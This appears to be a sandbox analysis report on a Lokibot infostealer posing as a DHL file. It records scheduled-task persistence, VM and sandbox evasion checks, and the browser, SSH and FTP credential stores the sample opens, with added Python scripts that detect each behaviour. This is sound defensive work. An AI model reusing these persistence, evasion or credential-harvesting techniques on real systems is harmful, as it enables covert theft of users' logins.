Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Users\user\Desktop\DHL FILE 267382.exe {path}
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Process created: C:\Users\user\Desktop\DHL FILE 267382.exe {path}
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Source: DHL FILE 267382.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: DHL FILE 267382.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

Yara detected aPLib compressed binary
Source: Yara match; File source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: DHL FILE 267382.exe PID: 6600, type: MEMORY
Source: Yara match; File source: Process Memory Space: DHL FILE 267382.exe PID: 6708, type: MEMORY
Source: Yara match; File source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: 0_2_070B18E5 push FFFFFF8Bh; iretd 0_2_070B18E7
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: 3_2_00402AC0 push eax; ret 3_2_00402AD4
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; Code function: 3_2_00402AC0 push eax; ret 3_2_00402AFC
Source: initial sample; Static PE information: section name: .text entropy: 7.59320889202
Source: C:\Users\user\Desktop\DHL FILE 267382.exe; File created (dropped file): C:\Users\user\AppData\Roaming\wmiRSwSoPk.exe

              Boot Survival:

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
              Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process information set: NOOPENFILEERRORBOX (31 identical entries collapsed; SetErrorMode flag SEM_NOOPENFILEERRORBOX, which suppresses the missing-file dialog so a failed load cannot stall the process)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process information set: NOGPFAULTERRORBOX (115 identical entries collapsed; SetErrorMode flag SEM_NOGPFAULTERRORBOX, which suppresses the crash dialog so an access violation terminates silently instead of hanging on a message box)
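The persistence chain above is a temp-staged scheduled task: the sample writes a task definition to tmp4DA9.tmp in the user's Temp directory, registers it under the Updates\ folder with schtasks.exe /Create /XML, and the dropped copy in AppData\Roaming carries the same wmiRSwSoPk name. The following script is an added example and is not part of the Joe Sandbox report. It re-implements the logic of the "Scheduled temp file as task from temp location" Sigma signature over constructed Sysmon-style process-creation events and then inspects a constructed task definition for an action that runs from a user-writable directory. The task XML is an assumption: the report names the file but does not show its contents.

```python
"""Hunting for scheduled-task persistence staged through a temp XML file.

Added example; not from the Joe Sandbox report. The events and the task
definition are constructed to mirror what the report shows.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\users\\public\\", "\\temp\\")

# Constructed events: the first mirrors the command line in the report, the
# second is a benign control (an installer registering its own updater).
EVENTS = [
    {
        "Image": r"C:\Windows\SysWOW64\schtasks.exe",
        "ParentImage": r"C:\Users\user\Desktop\DHL FILE 267382.exe",
        "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wmiRSwSoPk" '
                       r'/XML "C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp"',
    },
    {
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'schtasks.exe /Create /TN "Vendor\Updater" /XML "C:\Program Files\Vendor\updater.xml"',
    },
]

# Constructed task definition (hypothetical content for tmp4DA9.tmp). Real
# exports begin with a UTF-16 XML declaration, omitted here for brevity.
TASK_XML = {
    r"C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp": r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Users\user\AppData\Roaming\wmiRSwSoPk.exe</Command></Exec>
  </Actions>
</Task>
""",
}


def switch_value(cmdline, switch):
    """Return the argument following a schtasks switch, unquoting "..." or '...'."""
    pat = re.compile(re.escape(switch) + r'''\s+(?:"([^"]*)"|'([^']*)'|(\S+))''', re.IGNORECASE)
    m = pat.search(cmdline)
    if m is None:
        return None
    return next(g for g in m.groups() if g is not None)


def flag_temp_xml_task(event):
    """Sigma-style check: schtasks /Create whose /XML definition lives in a temp directory."""
    if not event["Image"].lower().endswith("\\schtasks.exe"):
        return None
    cmd = event["CommandLine"]
    if re.search(r"/create\b", cmd, re.IGNORECASE) is None:
        return None
    xml_path = switch_value(cmd, "/XML")
    if xml_path is None or not any(d in xml_path.lower() for d in TEMP_DIRS):
        return None
    return {"task": switch_value(cmd, "/TN"), "xml": xml_path, "parent": event["ParentImage"]}


def task_commands(xml_text):
    """Extract every <Exec><Command> from a Task Scheduler XML definition."""
    root = ET.fromstring(xml_text.strip())
    return [c.text.strip() for c in root.iter(TASK_NS + "Command") if c.text]


def runs_from_user_writable(command):
    """True when the action's executable sits in a directory a standard user can write."""
    return any(d in command.lower() for d in USER_WRITABLE)


def hunt(events, xml_store):
    """Correlate flagged schtasks invocations with the XML they registered."""
    findings = []
    for ev in events:
        hit = flag_temp_xml_task(ev)
        if hit is None:
            continue
        cmds = task_commands(xml_store[hit["xml"]]) if hit["xml"] in xml_store else []
        hit["commands"] = cmds
        hit["user_writable_payload"] = any(runs_from_user_writable(c) for c in cmds)
        findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in hunt(EVENTS, TASK_XML):
        print(finding)
```

On a live host the XML store would be replaced by collecting the temp file before the malware deletes it (Sysmon file-create events with the file content, or an EDR quarantine copy); if it is already gone, `schtasks /Query /TN "Updates\wmiRSwSoPk" /XML` returns the same definition from the task store.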

              Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match | File source: 00000000.00000002.233842339.0000000003379000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DHL FILE 267382.exe PID: 6600, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME (a kernel32 export that exists only under Wine)
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL (the DLL Sandboxie injects into sandboxed processes)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} (the CD-ROM device interface, whose vendor and product strings reveal the VMware virtual drive)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Thread delayed: delay time 922337203685477 ms (TimeSpan.MaxValue for a .NET sleep, effectively infinite; a sandbox has to skip it to observe any further behaviour)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe TID 6604 | Thread sleep time: 41500 ms (threshold 30000 ms)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe TID 6620 | Thread sleep time: 922337203685477 ms (threshold 30000 ms)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe TID 6712 | Thread sleep time: 120000 ms (threshold 30000 ms)
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function 3_2_00403D74: FindFirstFileW, FindNextFileW, FindFirstFileW, FindNextFileW
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: VMware
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmp | Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process queried: DebugPort (NtQueryInformationProcess/ProcessDebugPort, a direct check for an attached debugger)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function 3_2_0040317B: mov eax, dword ptr fs:[00000030h] (reads the PEB, whose BeingDebugged and NtGlobalFlag fields are the classic debugger checks)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function 3_2_00402B7C: GetProcessHeap, RtlAllocateHeap
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process token adjusted: Debug (SeDebugPrivilege enabled)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Process created: C:\Users\user\Desktop\DHL FILE 267382.exe {path} (the sample launches a second copy of itself; {path} is the report's placeholder for its own path, and the unpacked Lokibot PE is later found at 0x400000 in that child, PID 6708)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Queries volume information: C:\Users\user\Desktop\DHL FILE 267382.exe VolumeInformation
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation (the loaded GAC assemblies show the outer layer is a .NET loader)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Code function 3_2_00406069: GetUserNameW
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid (Lokibot derives its per-host identifier from this value)
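The strings listed above are the raw material of the sample's VM and sandbox fingerprinting: VMware Tools registry keys and install path, the SCSI/disk enumeration keys and display-adapter class key that expose virtual hardware names such as "VMware SVGA II", Sandboxie's SbieDll.dll and Wine's wine_get_unix_file_name export. The script below is an added example and not part of the Joe Sandbox report. It carves ASCII and UTF-16LE strings out of a process memory dump, maps them to those artefact families, and returns a verdict; the dump it runs on is a constructed byte buffer, and the family names and thresholds are the author's choices rather than anything the report defines.

```python
"""Triage of anti-analysis artefacts in a process memory dump.

Added example, not part of the report. The indicator strings are the ones the
report lists (VMware Tools registry keys, SCSI and disk enumeration keys, the
VMware SVGA II adapter name, SbieDll.dll, wine_get_unix_file_name). The dump
is constructed; real input comes from the sandbox or a debugger.
"""
import re

INDICATORS = {
    "vmware_registry": [
        r"SOFTWARE\VMware, Inc.\VMware Tools",
        r"\PROGRAM FILES\VMWARE\VMWARE TOOLS",
    ],
    "vmware_hardware": [
        "VMware SVGA II",
        r"HARDWARE\DEVICEMAP\Scsi\Scsi Port",
        r"SYSTEM\ControlSet001\Services\Disk\Enum",
        "{4D36E968-E325-11CE-BFC1-08002BE10318}",  # display adapter class key
    ],
    "sandboxie": ["SbieDll.dll"],
    "wine": ["wine_get_unix_file_name"],
}

# Printable runs of six or more characters, narrow (ASCII) and wide (UTF-16LE).
ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")


def extract_strings(blob):
    """Return (offset, text, encoding) for every ASCII and UTF-16LE run in the blob."""
    found = [(m.start(), m.group().decode("ascii"), "ascii") for m in ASCII_RUN.finditer(blob)]
    found += [(m.start(), m.group().decode("utf-16-le"), "utf16") for m in WIDE_RUN.finditer(blob)]
    return sorted(found)


def classify(blob):
    """Map artefact family -> matching strings (case-insensitive substring match)."""
    hits = {}
    for offset, text, enc in extract_strings(blob):
        low = text.lower()
        for family, needles in INDICATORS.items():
            if any(n.lower() in low for n in needles):
                hits.setdefault(family, []).append({"offset": offset, "string": text, "encoding": enc})
    return hits


def verdict(hits):
    """Several independent fingerprinting families is a strong evasion signal;
    a lone VMware string can also come from a legitimate installer."""
    families = 1 if ({"vmware_registry", "vmware_hardware"} & set(hits)) else 0
    families += sum(1 for f in ("sandboxie", "wine") if f in hits)
    if families >= 2:
        return "anti-analysis: multiple sandbox/VM fingerprinting families"
    if families == 1:
        return "single artefact family: possible fingerprinting, review"
    return "no known anti-analysis artefacts"


def build_sample_dump():
    """Constructed dump, not real process memory. SEP keeps adjacent narrow and
    wide strings from being carved as one run."""
    sep = b"\x00\x00"
    return (
        b"\x00" * 8
        + b"SOFTWARE\\VMware, Inc.\\VMware Tools" + sep
        + "VMware SVGA II".encode("utf-16-le") + sep
        + b"\x90" * 16 + b"Microsoft.VisualBasic" + sep
        + b"SbieDll.dll" + sep
        + "wine_get_unix_file_name".encode("utf-16-le") + sep
        + b"\xcc" * 4
    )


if __name__ == "__main__":
    found = classify(build_sample_dump())
    for family, entries in found.items():
        print(family, entries)
    print(verdict(found))
```

Carving both encodings matters for this sample: the outer layer is .NET, so its registry paths and device names live in memory as UTF-16, while the unpacked Lokibot payload keeps them as narrow strings; a scanner that only reads one of the two misses half the checks.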

              Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: DHL FILE 267382.exe PID: 6600, type: MEMORY
Source: Yara match | File source: Process Memory Space: DHL FILE 267382.exe PID: 6708, type: MEMORY
Source: Yara match | File source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions (KiTTY, a PuTTY fork, stores saved sessions here)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl (WinSCP's registry root; stored sessions live beneath it)
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data (Chrome's saved-credential SQLite database)
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\DHL FILE 267382.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
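What distinguishes this credential access from normal application behaviour is not any single open but the breadth: one process reads Chrome's Login Data, KiTTY and WinSCP session keys and three FTP clients' account stores in quick succession, and it is none of the applications that own them. The script below is an added example, not part of the Joe Sandbox report. It runs an owner allowlist over a constructed stream of file-open and registry-open events for exactly the stores listed above and escalates any process that touches several of them. The owner image names other than chrome.exe and WinSCP.exe are assumptions, and a real deployment would take the events from EDR file and registry telemetry.

```python
"""Flagging credential-store access by processes that do not own the store.

Added example, not part of the report. Events are constructed; the Chrome and
WinSCP owner names are real, the remaining owner image names are assumed.
"""
import fnmatch
import ntpath

CREDENTIAL_STORES = [
    # (store name, event type, lower-case fnmatch pattern, legitimate owner images)
    ("chrome-logins", "file", r"*\google\chrome\user data\*\login data", {"chrome.exe"}),
    ("kitty-sessions", "registry", r"hkey_current_user\software\9bis.com\kitty\sessions*", {"kitty.exe"}),
    ("winscp", "registry", r"hkey_current_user\software\martin prikryl*", {"winscp.exe"}),
    ("far-ftp", "registry", r"hkey_current_user\software\far2\plugins\ftp\hosts*", {"far.exe"}),
    ("classicftp", "registry", r"hkey_current_user\software\nch software\classicftp\ftpaccounts*", {"classicftp.exe"}),
    ("blazeftp", "registry", r"hkey_current_user\software\flashpeak\blazeftp\settings*", {"blazeftp.exe"}),
]

# Constructed events mirroring the report: PID 6708 is the sample's second
# instance; the chrome.exe and WinSCP.exe events are benign controls.
SAMPLE = r"C:\Users\user\Desktop\DHL FILE 267382.exe"
EVENTS = [
    {"type": "file", "pid": 6708, "image": SAMPLE,
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "file", "pid": 4120, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "registry", "pid": 6708, "image": SAMPLE,
     "path": r"HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions"},
    {"type": "registry", "pid": 6708, "image": SAMPLE,
     "path": r"HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"},
    {"type": "registry", "pid": 5200, "image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "path": r"HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"},
    {"type": "registry", "pid": 6708, "image": SAMPLE,
     "path": r"HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts"},
    {"type": "registry", "pid": 6708, "image": SAMPLE,
     "path": r"HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings"},
    {"type": "registry", "pid": 6708, "image": SAMPLE,
     "path": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"},  # not a store
]


def match_store(event):
    """Return (store name, owners) when the event touches a known credential store."""
    path = event["path"].lower()
    for name, kind, pattern, owners in CREDENTIAL_STORES:
        if kind == event["type"] and fnmatch.fnmatchcase(path, pattern):
            return name, owners
    return None


def detect(events):
    """One alert per credential-store access by an image that is not the store's owner."""
    alerts = []
    for ev in events:
        store = match_store(ev)
        if store is None:
            continue
        name, owners = store
        if ntpath.basename(ev["image"]).lower() in owners:
            continue
        alerts.append({"pid": ev["pid"], "image": ev["image"], "store": name, "path": ev["path"]})
    return alerts


def stores_per_process(alerts):
    """Distinct stores touched per PID; breadth across unrelated apps is the infostealer tell."""
    seen = {}
    for a in alerts:
        seen.setdefault(a["pid"], set()).add(a["store"])
    return seen


def harvesting_processes(alerts, min_stores=3):
    """PIDs that read at least min_stores different credential stores."""
    return sorted(pid for pid, stores in stores_per_process(alerts).items() if len(stores) >= min_stores)


if __name__ == "__main__":
    found = detect(EVENTS)
    for a in found:
        print(a)
    print("harvesting:", harvesting_processes(found))
```

A single non-owner open is worth an alert on its own (backup agents and password managers are the usual benign sources, and they are easy to allowlist by image); the `min_stores` escalation is what separates an infostealer run from a one-off false positive.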